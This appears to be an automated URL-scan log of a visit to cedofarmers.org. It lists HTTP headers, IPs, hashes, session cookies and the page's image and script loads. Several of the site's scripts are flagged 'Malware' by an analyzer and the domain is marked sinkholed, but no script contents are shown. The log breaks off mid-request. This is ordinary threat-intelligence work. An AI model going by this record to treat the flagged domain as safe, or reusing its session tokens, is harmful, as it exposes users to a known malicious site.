IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 251feed4603d868ab84aa13c9b8edbdb
381a81a8dcff741612c76f5fdfb42bc13372a119
2dc3848fa2917b3b909e39104657601f41876935b217371a50ee15f778e5a9f5
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F6ec06e64-918f-480d-ac05-7fea783ee61f.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 11723
x-amzn-requestid: 955f8ec3-9815-48ff-aa6a-250956377cdf
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bTTVLFo5oAMF2UA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-636acc20-70e216d808330566039aee89;Sampled=0
x-amzn-remapped-date: Tue, 08 Nov 2022 21:37:36 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: yq_iWDuX0BUgchE1acIl9ARNm1Zxd7bwoeTIEVoD9MYKGzwYmuM1aw==
via: 1.1 9c60d6224ac0b44e908b5c9dcf70e9a4.cloudfront.net (CloudFront), 1.1 b13f158bdf9805ca47e07c0c35870c12.cloudfront.net (CloudFront), 1.1 google
date: Tue, 08 Nov 2022 21:43:44 GMT
age: 2213
etag: "381a81a8dcff741612c76f5fdfb42bc13372a119"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F892db5b6-1bca-4d8f-b844-3201ef7b3ef0.jpeg
34.120.237.76200 OK 12 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F892db5b6-1bca-4d8f-b844-3201ef7b3ef0.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash e3d20f900a883cec8e0cab687df8a251
1105130523fb346dbab9ad2bb8d71c3f505425ce
b5ade9b1302479c4589eb659125d0111c55bb4520d72501cc47b295fd65e8a6e
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F892db5b6-1bca-4d8f-b844-3201ef7b3ef0.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 12510
x-amzn-requestid: ad966326-25a8-44df-880a-608572bf2538
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bTTTuExNIAMFilA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-636acc17-4eaa4fda178720702d9a9583;Sampled=0
x-amzn-remapped-date: Tue, 08 Nov 2022 21:37:27 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: ZlRHZYYt_p4bzFjTJAzXR08Oj0B_m9qLrpOAysjxJ2F9tzzF4G7U8g==
via: 1.1 6ba2a21321beeef65404429d0a4b6380.cloudfront.net (CloudFront), 1.1 e80693c02cfdfd081110512210d57840.cloudfront.net (CloudFront), 1.1 google
date: Tue, 08 Nov 2022 21:43:44 GMT
age: 2213
etag: "1105130523fb346dbab9ad2bb8d71c3f505425ce"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Faf9d55c4-e1e8-4687-8395-004d7c4a0225.jpeg
34.120.237.76200 OK 6.6 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Faf9d55c4-e1e8-4687-8395-004d7c4a0225.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash b3cd10472aabf86c5ffdfd06057f87f6
82728de12017be85f27e65a7222573058aad37c3
1bbb913786c95b51639193739d2cf01de1cdd8afe8b68dfef378b989129f0ef4
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Faf9d55c4-e1e8-4687-8395-004d7c4a0225.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 6635
x-amzn-requestid: 8348f858-989b-4643-b6f8-4f7254b154ee
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bTTmaHunIAMFalA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-636acc8f-02cc736a29efbcb473e20402;Sampled=0
x-amzn-remapped-date: Tue, 08 Nov 2022 21:39:27 GMT
x-amz-cf-pop: SEA19-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: h1nLdkhJjsLSGP0pS3mmDwAcsKSLD-rYRaRt4X9_L2jWTNQaiVJbqw==
via: 1.1 34f8ef0e4c880df0650a814412a26ea6.cloudfront.net (CloudFront), 1.1 02d90bf99fd6253b329a53c82f19e224.cloudfront.net (CloudFront), 1.1 google
date: Tue, 08 Nov 2022 21:43:44 GMT
age: 2214
etag: "82728de12017be85f27e65a7222573058aad37c3"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
cedofarmers.org/js/index.js
192.185.57.117200 OK 467 B URL HTTP/2 cedofarmers.org/js/index.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Hash 73fd203856751378aeb85a6f208f323e
40050647cc618d020743a5b763a5daca3c5d10e1
dbbf9922f8df175089acdbeae683e19d990ac333922a37bea45332170571f960
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/index.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Wed, 05 Jun 2019 08:05:04 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 467
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/main.js
192.185.57.117200 OK 2.3 kB URL HTTP/2 cedofarmers.org/js/main.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Hash b2f80211a529090e618b1f35f30f1d4d
0fb79a31eb9f7512452cfba90208632a5131c5e9
988394aa7d1206bc442db463165ef47cc253826aac2488861a8718b367cc2170
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/main.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 29 Jun 2019 03:45:10 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 2305
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/main.js
192.185.57.117404 Not Found 2.4 kB IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, ASCII text, with very long lines (5395)
Hash 2cdccc9eccc72b2742298d87caffaad1
6edb66f8bee92447167a98055ae225ee85945647
a4033c6180cf444d30d417f543c3c7b28b291d28169557e02269168f4ce20678
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /main.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 404 Not Found
cache-control: no-cache, private
date: Tue, 08 Nov 2022 22:20:36 GMT
vary: Accept-Encoding
content-encoding: gzip
content-length: 2401
content-type: text/html; charset=UTF-8
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/google-map.js
192.185.57.117404 Not Found 2.4 kB URL HTTP/2 cedofarmers.org/js/google-map.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, ASCII text, with very long lines (5395)
Hash 2cdccc9eccc72b2742298d87caffaad1
6edb66f8bee92447167a98055ae225ee85945647
a4033c6180cf444d30d417f543c3c7b28b291d28169557e02269168f4ce20678
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/google-map.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 404 Not Found
cache-control: no-cache, private
date: Tue, 08 Nov 2022 22:20:36 GMT
vary: Accept-Encoding
content-encoding: gzip
content-length: 2401
content-type: text/html; charset=UTF-8
server: Apache
X-Firefox-Spdy: h2
ocsp.digicert.com/
93.184.220.29200 OK 471 B IP 93.184.220.29:0
Hash 69293b8c8a45196bb68c2fb4a573ee67
fbd418617bfbf280af580abf1d2698db8228d84b
bda77decf1a738ce7c86b23325d36faeff1878c643547c54dd62f182fc7ad5ed
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 404
Cache-Control: max-age=142470
Content-Type: application/ocsp-response
Date: Tue, 08 Nov 2022 22:20:38 GMT
Etag: "636a5e28-1d7"
Expires: Thu, 10 Nov 2022 13:55:08 GMT
Last-Modified: Tue, 08 Nov 2022 13:48:24 GMT
Server: ECS (ska/F704)
X-Cache: HIT
Content-Length: 471
cedofarmers.org/js/jquery.magnific-popup.min.js
192.185.57.117200 OK 9.2 kB URL HTTP/2 cedofarmers.org/js/jquery.magnific-popup.min.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type ASCII text, with very long lines (20087)
Hash 7a10ae63b238729dc4da7f7bd8986219
654c47168dca0ec7080f6c57e8c4482b57f879d4
b782185399b361358f7c409d6f23f22d45f695dcbb63876c35752c7b1de72db3
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/jquery.magnific-popup.min.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 9204
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FCommunity-Enterprises-Development-Organisation-CEDO-103372861641737%2F&tabs=timeline&width=340&height=500&small_header=false&adapt_container_width=true&hide_cover=false&show_facepile=true&appId=556701741929541
31.13.72.36200 OK 15 kB URL HTTP/2 www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FCommunity-Enterprises-Development-Organisation-CEDO-103372861641737%2F&tabs=timeline&width=340&height=500&small_header=false&adapt_container_width=true&hide_cover=false&show_facepile=true&appId=556701741929541
IP 31.13.72.36:0
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (18899)
Hash a8a93ea175dce4f71b348abef7a56fbf
53ade60077a076ff9dd79d635440c4727ce1acee
2d5844dddab8e3052b5e4b2b3211f0451e3e3ce8d2b074a6323a9e26e7821468
GET /plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FCommunity-Enterprises-Development-Organisation-CEDO-103372861641737%2F&tabs=timeline&width=340&height=500&small_header=false&adapt_container_width=true&hide_cover=false&show_facepile=true&appId=556701741929541 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
vary: Accept-Encoding
content-encoding: br
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self' connect.facebook.net;style-src fonts.googleapis.com *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ v.whatsapp.net *.fbsbx.com *.fb.com;font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com *.tenor.co media.tenor.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net *.giphy.com connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com https://*.giphy.com data:;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?minimize=0;
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self' connect.facebook.net;style-src fonts.googleapis.com *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ v.whatsapp.net *.fbsbx.com *.fb.com;font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com *.tenor.co media.tenor.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net *.giphy.com connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com https://*.giphy.com data:;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-opener-policy: unsafe-none
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
strict-transport-security: max-age=15552000; preload
content-type: text/html; charset="utf-8"
x-fb-debug: fXf+Uhe/EYzT/BY4pFIeNKAXxFi2WV8cRyIltoAX2nqXA07m930KhVLi49Fk/HwpD9+xGCq5vQA1EsE2gK2AxQ==
date: Tue, 08 Nov 2022 22:20:38 GMT
priority: u=3,i
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3/y7/r/_jixirLUzY9.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12200 OK 4.5 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/y7/r/_jixirLUzY9.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type ASCII text, with very long lines (2186)
Hash 33ae46fb5ca5586b8eb684c440bdfde3
cc75ec00d4e015261cbc526606a7478ad72a9e43
c475fadc8a824492c8eeba78780349b668c4111794dcbe1a18fcd19bbee38de4
GET /rsrc.php/v3/y7/r/_jixirLUzY9.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 03 Nov 2023 06:15:25 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: M65G+1ylWGuOtoTEQL394w==
x-fb-debug: VQd+jiE/YM9O7IEUhklCp4iUczum/ERYFsBbEam6pexOxiTBzn2vBUxMsU53Ri0PbzNXpdK+OVkgLH6mDgWdqw==
content-length: 4455
x-fb-trip-id: 1904183273
date: Tue, 08 Nov 2022 22:20:38 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3/yl/r/SuHirPIqipH.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12200 OK 8.2 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/yl/r/SuHirPIqipH.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type ASCII text, with very long lines (9885)
Hash 0eaa197a5c011011e1489f411b042249
9ba134dd641bbbc6ce70619ccd94f5d5ef47a899
145cfec975ec864e6589409173f8f9fee2a59faf0ce28c42889897e812ab9ac4
GET /rsrc.php/v3/yl/r/SuHirPIqipH.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
